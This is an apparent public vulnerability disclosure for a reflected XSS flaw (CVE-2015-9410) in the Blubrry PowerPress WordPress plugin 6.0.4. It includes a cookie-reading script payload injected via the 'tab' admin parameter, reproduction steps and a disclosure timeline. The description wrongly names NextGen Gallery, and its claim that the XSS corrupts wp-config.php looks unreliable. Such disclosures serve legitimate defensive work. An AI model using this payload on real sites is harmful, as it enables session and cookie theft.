Headline
CVE-2015-9410: XSS Vulnerability in Blubrry PowerPress Podcasting plugin Version 6.0.4 · Issue #7 · cybersecurityworks/Disclosed
The Blubrry PowerPress Podcasting plugin 6.0.4 for WordPress has XSS via the tab parameter.
Details
Word Press Product Bugs Report
Bug Name Cross Site Scripting (XSS)
Software: Blubrry PowerPress Podcasting plugin
Version: 6.0.4
Last Updated: 27-08-2015
Homepage: https://wordpress.org/plugins/powerpress/developers/
Compatible Up to Wordpress 4.3.0 Version (Requires: 3.6 or higher)
Severity High
Description: Cross Site Scripting (XSS) vulnerability in WordPress plugin NextGen Gallery
Proof of concept: (POC)
Visit the following page on a site with this plugin installed. http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php and modify the value of tab variable with "></script><script>alert(document.cookie);</script> payload and send the request to the server.
Now, the added XSS payload will be echoed back from the server without validating the input. It also affects wp-config.php file, $table_prefix and corrupts the database connectivity.
Note: XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to wp-config.php file.
define( 'DISALLOW_UNFILTERED_HTML’, true );
Issue 1:
The Post Request tab variable in the URL http://localhost/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php is vulnerable to Cross Site Scripting (XSS)
Figure 1: Invalid HTTP script Request sent to the server through the vulnerable tab variable in the URL http://yourwordpresssite.com/wordpress/wp-admin/admin.php?page=powerpress/powerpressadmin_basic.php and its echoed back in the HTTP Response without validation.
Reproducing Steps
- Logon into any wordpress application (localhost or public host)
- Modifying the value of tab variable in Blubrry PowerPress Version 6.0.4
- Fill all the variables with "></script><script>alert(document.cookie);</script> payload and send the request to the server.
- Now, the added XSS payload will be echoed back from the server without validating the input even after wp-config.php file has been configured with XSS filter settings.
Timeline
2015-09-04 – Discovered in Blubrry PowerPress Podcasting plugin 6.0.4 version.
2015-09-04 – Reported to [email protected]
2015-09-07 – Vendor Responded, “Thank you for reporting this plugin. We’re looking into it right now.”
2015-09-09 – Fixed in Blubrry PowerPress Podcasting plugin 6.0.5 version.
Discovered by:
Sathish from Cyber Security Works Pvt Ltd